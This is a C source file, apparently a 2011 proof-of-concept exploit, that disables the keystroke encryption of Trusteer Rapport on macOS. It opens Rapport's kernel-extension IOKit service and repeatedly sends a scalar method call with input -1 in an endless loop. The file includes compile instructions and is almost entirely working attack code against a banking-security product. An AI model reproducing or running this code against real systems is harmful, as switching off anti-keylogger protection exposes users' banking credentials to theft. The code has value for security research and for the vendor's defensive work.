/* rapport-switchoff.c
 *
 * Copyright (c) 2011 by <mu-b@digit-labs.org>
 *
 * Trusteer Rapport key encryption switch off
 * by mu-b - Thu 07 Jul 2011
 *
 * - Tested on: Trusteer Rapport (Apple MACOS X 10.6.4)
 *
 * erm, broken design you might say? some might say useless.
 *
 * compile: gcc -Wall rapport-switchoff.c -o rapport-switchoff -framework IOKit -framework ApplicationServices
 *
 *    - Private Source Code -DO NOT DISTRIBUTE -
 * http://www.digit-labs.org/ -- Digit-Labs 2011!@$!
 */

#include <stdio.h>
#include <stdlib.h>

#include <ApplicationServices/ApplicationServices.h>

int
main (int argc, char **argv)
{
  io_connect_t rapport_port;
  io_service_t service;
  kern_return_t kr;
  uint64_t input;
  
  printf ("Trusteer Rapport key encryption switch off\n"
          "by: <mu-b@digit-labs.org>\n"
          "http://www.digit-labs.org/ -- Digit-Labs 2011!@$!\n\n");

  service = IOServiceGetMatchingService (kIOMasterPortDefault,
                                         IOServiceMatching("com_trusteer_rapportke"));
  if (!service)
    {
      fprintf (stderr, "* IOServiceGetMatchingService failed, rapport running?\n");
      return (EXIT_FAILURE);
    }

  rapport_port = (io_connect_t) 0;
  kr = IOServiceOpen (service, mach_task_self (), 0, &rapport_port);
  IOObjectRelease (service);

  if (kr != kIOReturnSuccess)
    {
      fprintf (stderr, "* IOServiceOpen failed\n");
      return (EXIT_FAILURE);
    }

  while (1)
    {
      input = -1;
      kr = IOConnectCallScalarMethod (rapport_port, 0, &input, 1, NULL, NULL);
      if (kr != kIOReturnSuccess)
        {
          fprintf (stderr, "* IOConnectCallScalarMethod failed\n");
          return (EXIT_FAILURE);
        }

      usleep (200000);
    }

  return (EXIT_SUCCESS);
}
